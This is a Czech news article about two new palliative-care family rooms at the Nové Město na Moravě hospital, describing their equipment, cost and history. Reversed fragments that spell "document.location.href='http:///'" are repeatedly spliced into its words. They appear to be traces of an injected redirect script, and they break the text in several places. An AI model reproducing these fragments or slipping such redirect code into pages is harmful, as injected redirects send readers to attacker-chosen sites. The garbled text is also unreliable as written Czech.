Rainbow page separator

V novoměstské nemocnici zprovoznili další dva rodinné pokoje

Pátek, 6. srpna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Dva nové rodinné pokoje uvedli do provozu v novoměstské nemocnici na oddělení dlouhodobě nemocných. Jsou speciálně upravené a určené lidem, jejichž život se chýlí ke konci a kteří vyžadují odpovídající paliativní péči. Nemocnice je zřídila díky daru od Nadačního fondu Abakus (dříve Avast).
„Pokoje mohou využít lidé v konečné fázi nevyléčitelného onemocnění. Pacient tam může trávit poslední chvíle života společně se svými nejbližšími, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to po libovolně dlouhou dobu s možností přespání člena rodiny. Nemůžeme nahradit domácí prostředí, ale rodinné pokoje jsou koncipovány tak, aby se v nich pacient cítil ‚jako doma‘,“ uvedla vrchní sestra oddělení dlouhodobě nemocných Kateřina Havlová.
Vedle péče zajištěné nepřetržitě lékařem a zdravotnickým personálem je po domluvě možné využívat sociální, psychologickou a duchovní podporu posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou pracovníky zdravotnického zařízení.
„Stavební úpravy koupelen a vybavení pokojů stálo zhruba 360 tisíc korun. Každý pokoj je vybaven lůžkem s antidekubitní matrací, která zvyšuje pohodlí pacienta. Pro doprovázející osobu je k dispozici sklopné lůžko, kuchyňská linka s lednicí a mikrovlnnou troubou, televize a rádio. Součástí pokoje je samostatná koupelna,“ doplnila vrchní sestra.
První takzvaný rodinný pokoj vznikl v roce 2006 v rámci pilotního projektu Kraje Vysočina v léčebně dlouhodobě nemocných na Buch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově kopci, jež spadala pod nemocnici. Pacientům sloužil do roku 2011, kdy bylo zařízení uzavřeno a veškerá péče přesunuta do Nového Města. V současně době jsou k dispozici čtyři rodinné pokoje, přičemž v posledních dvou letech tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možnost využilo pětatřicet pacientů.